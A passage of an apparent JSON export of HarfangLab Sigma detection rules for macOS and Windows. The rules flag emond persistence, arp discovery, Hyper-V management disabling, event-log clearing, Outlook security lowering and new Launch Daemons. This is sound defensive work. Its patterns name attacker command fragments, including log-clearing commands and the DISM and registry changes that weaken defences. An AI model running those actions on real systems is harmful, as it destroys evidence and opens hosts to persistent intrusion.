"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617436Z",
"creation_date": "2026-03-23T11:45:34.617438Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617442Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.xorrior.com/emond-persistence/",
"https://attack.mitre.org/techniques/T1546/014/"
],
"name": "t1546_014_emond_persistence_execution.yml",
"content": "title: Suspicious Process Execution via Emond\nid: 42cd8416-c43f-466f-992d-7a756d832d7a\ndescription: |\n Detects the execution of a suspicious process by the Event Monitor Daemon (emond).\n Emond can be manipulated by adversaries to execute arbitrary commands in response to specific system events, such as during system startup or user logon.\n It is recommended to check the legitimacy of the process by analyzing the rules triggering its execution, and the context in which emond is used.\nreferences:\n - https://www.xorrior.com/emond-persistence/\n - https://attack.mitre.org/techniques/T1546/014/\ndate: 2024/05/15\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.014\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessParentImage: '/sbin/emond'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42cd8416-c43f-466f-992d-7a756d832d7a",
"rule_name": "Suspicious Process Execution via Emond",
"rule_description": "Detects the execution of a suspicious process by the Event Monitor Daemon (emond).\nEmond can be manipulated by adversaries to execute arbitrary commands in response to specific system events, such as during system startup or user logon.\nIt is recommended to check the legitimacy of the process by analyzing the rules triggering its execution, and the context in which emond is used.\n",
"rule_creation_date": "2024-05-15",
"rule_modified_date": "2025-01-30",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.014"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "43289013-d5b5-48ec-bcd4-77826f38f079",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090488Z",
"creation_date": "2026-03-23T11:45:34.090490Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090494Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
"https://www.intrinsec.com/alphv-ransomware-gang-analysis/",
"https://attack.mitre.org/techniques/T1016/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1016_arp_windows.yml",
"content": "title: Arp Execution (Windows)\nid: 43289013-d5b5-48ec-bcd4-77826f38f079\ndescription: |\n Detects the execution of arp.exe.\n Arp.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to gather detailed information about a system's Address Resolution Protocol (ARP) tables.\n It is recommended to analyze the process responsible for the execution of arp.exe to look for malicious content or actions.\nreferences:\n - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\n - https://www.intrinsec.com/alphv-ransomware-gang-analysis/\n - https://attack.mitre.org/techniques/T1016/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2021/05/26\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - attack.t1018\n - attack.s0099\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\arp.exe'\n # Renamed binaries\n - OriginalFileName: 'arp.exe'\n exclusion_commandline:\n CommandLine|contains:\n # Used to edit the table records.\n - '-s'\n - '-d'\n exclusion_explorer:\n ParentImage: '?:\\Windows\\System32\\cmd.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\WindowsAzure\\Packages\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages\\WaAppAgent.exe'\n - '?:\\Windows\\Lenovo\\ImController\\PluginHost86\\Lenovo.Modern.ImController.PluginHost.CompanionApp.exe'\n - '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n - '*\\SolarWinds\\SolarWinds.BusinessLayerHost.exe'\n\n exclusion_atera:\n # C:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\n CurrentDirectory: '?:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools'\n # powershell.exe -File C:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\\cde53007-46c2-51a0-8c64-f8da2d10c3d6_IPScan.ps1\n # powershell.exe -File C:\\Windows\\TEMP\\08886e14-da1c-43e3-b4a9-b782f11e8d18_IPScan.ps1\n ParentCommandLine|contains:\n - '?:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\\'\n - '_IPScan.ps1'\n\n exclusion_azure_networkwatcher:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c arp -a >> config\\Neighbors.txt'\n GrandparentCommandLine: '?:\\Windows\\system32\\cscript.exe ?:\\Windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_inssider:\n ParentImage: '?:\\Users\\\\*\\AppData\\Local\\inSSIDer\\app-?.?.?\\inSSIDer.exe'\n\n exclusion_nessus:\n GrandparentImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c ?:\\Windows\\System32\\arp.exe -a > ?:\\Windows\\temp\\nessus_????????.txt'\n\n exclusion_netbackup:\n ProcessParentImage|endswith: '\\bpcd.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature|contains: 'Veritas Technologies LLC'\n\n exclusion_lansweeper:\n ProcessParentImage|endswith: '\\LansweeperService.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature|contains: 'Lansweeper NV'\n\n exclusion_netgear:\n ProcessGrandparentImage|endswith: '\\Engage.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature|contains: 'Netgear Inc'\n\n exclusion_ninjarmm:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\\\*\\NinjaRMMAgent.exe|'\n\n exclusion_espcli:\n ProcessParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c arp -a *>adrmac.txt'\n ProcessGrandparentCommandLine: '.\\espcli_parc'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "43289013-d5b5-48ec-bcd4-77826f38f079",
"rule_name": "Arp Execution (Windows)",
"rule_description": "Detects the execution of arp.exe.\nArp.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to gather detailed information about a system's Address Resolution Protocol (ARP) tables.\nIt is recommended to analyze the process responsible for the execution of arp.exe to look for malicious content or actions.\n",
"rule_creation_date": "2021-05-26",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016",
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4332ec13-a2db-40c4-8915-d22355e770f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626126Z",
"creation_date": "2026-03-23T11:45:34.626128Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626132Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines",
"https://attack.mitre.org/techniques/T1564/006/"
],
"name": "t1564_006_disable_hyperv_managmement.yml",
"content": "title: Windows Hyper-V Management Disabled\nid: 4332ec13-a2db-40c4-8915-d22355e770f0\ndescription: |\n Detects the deactivation of Windows Hyper-V management tools feature.\n This command disable the Hyper-V management tools feature on Windows without restarting the system.\n Attackers may disable the Microsoft-Hyper-V-Management-Clients feature to remove local management visibility, allowing them to run hidden virtual machines that evade host-based detection and operate more stealthily.\n It is recommended to investigate the parent process to determine if this action was legitimate.\nreferences:\n - https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\n - https://attack.mitre.org/techniques/T1564/006/\ndate: 2025/11/12\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Dism.exe'\n - OriginalFileName: 'DISM.EXE'\n\n selection_command:\n CommandLine|contains|all:\n - ' ?online'\n - ' ?disable-feature'\n - ' ?microsoft-hyper-v-Management-clients'\n - ' ?norestart '\n\n exclusion_ldplayer:\n - ProcessParentImage: '?:\\LDPlayer\\LDPlayer9\\dnrepairer.exe'\n - ProcessParentOriginalFileName: 'repairer.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Shanghai Baizhi Network Technology Co., Ltd.'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4332ec13-a2db-40c4-8915-d22355e770f0",
"rule_name": "Windows Hyper-V Management Disabled",
"rule_description": "Detects the deactivation of Windows Hyper-V management tools feature.\nThis command disable the Hyper-V management tools feature on Windows without restarting the system.\nAttackers may disable the Microsoft-Hyper-V-Management-Clients feature to remove local management visibility, allowing them to run hidden virtual machines that evade host-based detection and operate more stealthily.\nIt is recommended to investigate the parent process to determine if this action was legitimate.\n",
"rule_creation_date": "2025-11-12",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "43a740ac-2e54-4653-84a7-349b469a0a35",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627609Z",
"creation_date": "2026-03-23T11:45:34.627611Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627615Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_application_log.yml",
"content": "title: Windows Application Log Cleared\nid: 43a740ac-2e54-4653-84a7-349b469a0a35\ndescription: |\n Detects when one of the Windows application logs is cleared.\n Windows Event Logs are a record of a computer's alerts and notifications.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n It is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2021/04/27\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 104\n Source: Microsoft-Windows-Eventlog\n ProcessImage|contains: '?'\n\n # This is handled by the rule 5cf9b4f6-6f3b-4d0b-a178-9570cce9693d\n filter_wevtutil_1:\n - ProcessImage|endswith: '\\wevtutil.exe'\n - ProcessOriginalFileName: 'wevtutil.exe'\n\n filter_wevtutil_2:\n ProcessCommandLine|contains:\n - ' clear-log '\n - ' cl '\n\n filter_ps_1:\n - ProcessImage|endswith: '\\powershell.exe'\n - ProcessOriginalFileName: 'PowerShell.EXE'\n\n filter_ps_2:\n - ProcessCommandLine|contains:\n - ' Clear-EventLog '\n - ' Remove-EventLog '\n\n filter_wmic_1:\n - ProcessImage|endswith: '\\wmic.exe'\n - ProcessOriginalFileName: 'wmic.exe'\n\n filter_wmic_2:\n ProcessCommandLine|contains: ' ClearEventLog'\n\n exclusion_channel:\n Channel:\n - 'ModemAuthenticatorLog'\n - 'Microsoft-Exchange-ManagedAvailability/ThrottlingConfig'\n\n exclusion_image:\n - ProcessImage:\n - '?:\\Program Files\\CCleaner\\CCleaner64.exe'\n - '?:\\Windows\\System32\\Sysprep\\sysprep.exe'\n - '?:\\Program Files (x86)\\Hewlett-Packard\\HP Touchpoint Manager\\Tools\\tainstaller.exe'\n - '?:\\Program Files (x86)\\HP\\HP Touchpoint Analytics Client Installer\\TAInstaller.exe'\n - '?:\\Program Files (x86)\\HP\\HP Touchpoint Analytics Client\\TouchpointAnalyticsClientService.exe'\n - '?:\\Program Files (x86)\\HP\\HP Touchpoint Analytics Client\\TouchpointGpuInfo.exe'\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\PSANCU.exe'\n - '?:\\Windows\\System32\\mmc.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Program Files (x86)\\Glary Utilities\\TracksEraser.exe'\n - ProcessParentImage:\n - '?:\\Program Files\\CCleaner\\CCleaner64.exe'\n - '?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\Citrix.Wem.Agent.Service.exe'\n - ProcessGrandparentImage:\n - '?:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\\AgentPackageSystemTools.exe'\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\Program Files (x86)\\Lenovo\\LenovoWelcome\\x86\\LenovoWelcomeTask.exe'\n - '*\\CLEANMGR+\\Cleanmgr+.exe'\n - '*\\CLEANMGR+\\cleanmgrplus\\Cleanmgr+.exe'\n - '*\\Cleanmgr+ v*\\Cleanmgr+.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '\\PrivaZer\\PrivaZer v*.exe|'\n - '?:\\Program Files (x86)\\F-Secure\\Client Security\\UltralightInstaller\\ul_*.exe'\n - '?:\\Program Files (x86)\\Panda Security\\Panda Aether Agent\\AgentSvc.exe'\n\n exclusion_dism:\n ProcessImage|endswith: '\\Dism++x64.exe'\n ProcessOriginalFileName: 'Dism++.exe'\n\n exclusion_ccm:\n - ProcessCommandLine|contains: '?:\\WINDOWS\\CCM\\SystemTemp\\\\????????-????-????-????-????????????.ps1'\n - ProcessGrandparentImage: '?:\\Windows\\CCM\\TSManager.exe'\n\n exclusion_bis:\n ProcessGrandparentCommandLine:\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\PrepareBaseImage.cmd'\n - 'Powershell.exe -WindowStyle Maximize -file ?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\framework\\PrepBISF_Start.ps1'\n\n exclusion_lenovo:\n - ProcessParentImage: '?:\\ProgramData\\Lenovo\\LenovoNow\\Downloads\\LenovoNow.Updater.exe'\n - ProcessAncestors|contains: '?:\\Program Files (x86)\\Lenovo\\LenovoNow\\unins???.exe'\n\n exclusion_ccleaner:\n - ProcessOriginalFileName: 'ccleaner.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Piriform Ltd'\n - ProcessDescription: 'CCleaner Service'\n ProcessSigned: 'true'\n ProcessSignature: 'Gen Digital Inc.'\n\n condition: selection and not ((all of filter_wevtutil_*) or (all of filter_ps_*) or (all of filter_wmic_*)) and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "43a740ac-2e54-4653-84a7-349b469a0a35",
"rule_name": "Windows Application Log Cleared",
"rule_description": "Detects when one of the Windows application logs is cleared.\nWindows Event Logs are a record of a computer's alerts and notifications.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nIt is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\n",
"rule_creation_date": "2021-04-27",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "43ab3f91-4b1e-4b6c-b17b-6c7c6048fc09",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626772Z",
"creation_date": "2026-03-23T11:45:34.626774Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626778Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1578678728242081792",
"https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
"https://attack.mitre.org/techniques/T1137/"
],
"name": "t1137_outlook_security_allowing_startup_persistence.yml",
"content": "title: Outlook Security Level Lowered allowing Startup Persistence\nid: 43ab3f91-4b1e-4b6c-b17b-6c7c6048fc09\ndescription: |\n Detects modification of the Outlook application security level.\n If this level is lowered to 1, it opens the path to a low privileged persistence mechanism through Outlook VBA startup scripts.\n It is recommended to determine if this is a wanted action by the system administrator or third party software, if so, it is recommended to whitelist the product or script responsible for the action.\n If it is part of a persistence attempt, it is recommended to isolate the machine and revert the configuration change.\nreferences:\n - https://twitter.com/malmoeb/status/1578678728242081792\n - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\n - https://attack.mitre.org/techniques/T1137/\ndate: 2022/10/10\nmodified: 2026/02/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\S*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Security\\Level'\n Details: 'DWORD (0x00000001)'\n\n exclusion_ivanti:\n ProcessImage: '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_office:\n ProcessOriginalFileName:\n - 'Outlook.exe'\n - 'WinWord.exe'\n - 'MSACCESS.EXE'\n - 'Excel.exe'\n - 'POWERPNT.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "43ab3f91-4b1e-4b6c-b17b-6c7c6048fc09",
"rule_name": "Outlook Security Level Lowered allowing Startup Persistence",
"rule_description": "Detects modification of the Outlook application security level.\nIf this level is lowered to 1, it opens the path to a low privileged persistence mechanism through Outlook VBA startup scripts.\nIt is recommended to determine if this is a wanted action by the system administrator or third party software, if so, it is recommended to whitelist the product or script responsible for the action.\nIf it is part of a persistence attempt, it is recommended to isolate the machine and revert the configuration change.\n",
"rule_creation_date": "2022-10-10",
"rule_modified_date": "2026-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1137"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "43dcad9d-1139-4d66-a5ee-93fb0336f1f9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294868Z",
"creation_date": "2026-03-23T11:45:35.294892Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294899Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/004/",
"https://attack.mitre.org/techniques/T1152/"
],
"name": "t1543_004_new_daemon_file.yml",
"content": "title: New Launch Daemon Added via Filesystem\nid: 43dcad9d-1139-4d66-a5ee-93fb0336f1f9\ndescription: |\n Detects a new Launch Daemon file being created.\n An attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\n Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\n Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\n It is recommended to investigate the newly created Launch Daemon for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\n - https://attack.mitre.org/techniques/T1152/\ndate: 2023/07/11\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.004\n - attack.t1152\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/bin/mv'\n - '/bin/cp'\n - '/usr/bin/rsync'\n CommandLine|contains:\n - ' /Library/LaunchDaemons/'\n # Also catch /Users//Library/LaunchAgents\n - ' /Library/LaunchAgents/'\n\n # This is handled by the rule a1ed8019-9b29-4699-9c30-056751959bd0\n filter_invisible_file:\n CommandLine|contains:\n - ' /Library/LaunchDaemons/.'\n - ' /Library/LaunchAgents/.'\n\n exclusion_jamf:\n ParentImage: '/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher'\n\n exclusion_glpi:\n CommandLine: 'cp -f org.glpi-project.glpi-agent.plist /library/launchdaemons/org.glpi-project.glpi-agent.plist'\n ParentCommandLine: 'sudo cp -f org.glpi-project.glpi-agent.plist /library/launchdaemons/org.glpi-project.glpi-agent.plist'\n\n exclusion_eset:\n CommandLine|startswith:\n - 'cp -f /Library/Application Support/ESET/Security/var/updated/plists/'\n - 'mv -f /Library/LaunchDaemons/*.plist /Library/Application Support/ESET/Security/var/updated/plists/*.plist'\n - 'mv -f /Library/LaunchAgents/*.plist /Library/Application Support/ESET/Security/var/updated/plists/*.plist'\n\n exclusion_microsoft:\n CommandLine:\n - '/bin/cp /library/application support/microsoft/mau2.0/microsoft autoupdate.app/contents/library/launchagents/com.microsoft.update.agent.plist /library/launchagents/'\n - '/bin/cp /library/application support/microsoft/mau2.0/microsoft autoupdate.app/contents/library/launchdaemons/com.microsoft.autoupdate.helper.plist /library/launchdaemons/'\n\n exclusion_zoom:\n CommandLine: 'cp -f us.zoom.zoomdaemon.plist /library/launchdaemons/us.zoom.zoomdaemon.plist'\n\n exclusion_installer:\n - ParentCommandLine|contains: ' /tmp/PKInstallSandbox.??????/'\n - GrandparentCommandLine|contains: ' /tmp/PKInstallSandbox.??????'\n\n exclusion_packagekit:\n GrandparentCommandLine: '/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n\n exclusion_paceap:\n GrandparentCommandLine: '/Library/PrivilegedHelperTools/licenseDaemon.app/Contents/MacOS/licenseDaemon --backurl https://activation.paceap.com/InitiateActivation'\n\n exclusion_pearcleaner:\n GrandparentImage: '/Applications/Pearcleaner.app/Contents/MacOS/PearcleanerHelper'\n\n exclusion_trendmicro:\n ParentCommandLine: 'cp /Library/Application Support/com.trendmicro.endpointbasecamp/modules/ceta/CETAgent.app/Contents/Resources/com.trendmicro.cetagent.plist /Library/LaunchDaemons/com.trendmicro.cetagent.plist'\n\n exclusion_ea:\n GrandparentImage: '/Applications/EA app.app/Contents/Applications/EALaunchHelper.app/Contents/MacOS/EALaunchHelper'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "43dcad9d-1139-4d66-a5ee-93fb0336f1f9",
"rule_name": "New Launch Daemon Added via Filesystem",
"rule_description": "Detects a new Launch Daemon file being created.\nAn attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\nLaunch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\nLaunch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\nIt is recommended to investigate the newly created Launch Daemon for malicious content.\n",
"rule_creation_date": "2023-07-11",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1152",
"attack.t1543.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "43dff950-782f-403b-8b2b-8a2d3025027b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
